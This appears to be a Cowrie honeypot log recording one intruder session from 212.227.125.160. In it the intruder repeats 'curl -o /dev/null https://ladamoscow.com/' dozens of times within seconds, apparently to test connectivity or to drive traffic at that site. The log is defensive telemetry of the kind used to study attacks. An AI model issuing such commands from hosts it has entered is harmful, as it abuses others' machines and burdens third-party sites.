{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.363865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.400667Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.401667Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.438841Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.439914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.494017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.495262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.539711Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.540719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.584233Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.585218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.621593Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.622756Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.659536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.660511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.703824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.704817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.753862Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.754824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.808591Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.809612Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.846247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.847156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.884496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.885389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.932232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.933104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.969419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.970496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.012631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.013497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.054160Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.055133Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.097501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.098584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.144007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.144872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.196507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.197374Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.237450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.238640Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.275015Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.275903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.312604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.313501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.360695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.361883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.399117Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.399945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.436103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.436985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.474039Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.474922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.511714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.512752Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.549306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.550343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.586963Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.587826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.624196Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.625070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.661391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.663081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.702404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.703121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.750212Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.751085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.787779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.788733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.827142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.828396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.865499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.866463Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.903964Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.905661Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.943735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.944487Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:43.986259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:43.986978Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.039166Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.040540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.077708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.078687Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.126068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.127275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.179201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.180333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.216865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.217762Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.254590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.255533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.295625Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.296540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.334353Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.335415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.381159Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.382150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.427571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.428491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.469949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.470917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.510191Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.511408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.551297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.552305Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.599993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.600981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.664531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.665510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.702683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.703635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.740483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.741485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.778604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.779860Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.817086Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.818000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.954773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.955790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:44.993778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:44.995451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.032638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.033671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.086979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.087913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.164434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.165716Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.204903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:45.206036Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:45.243654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
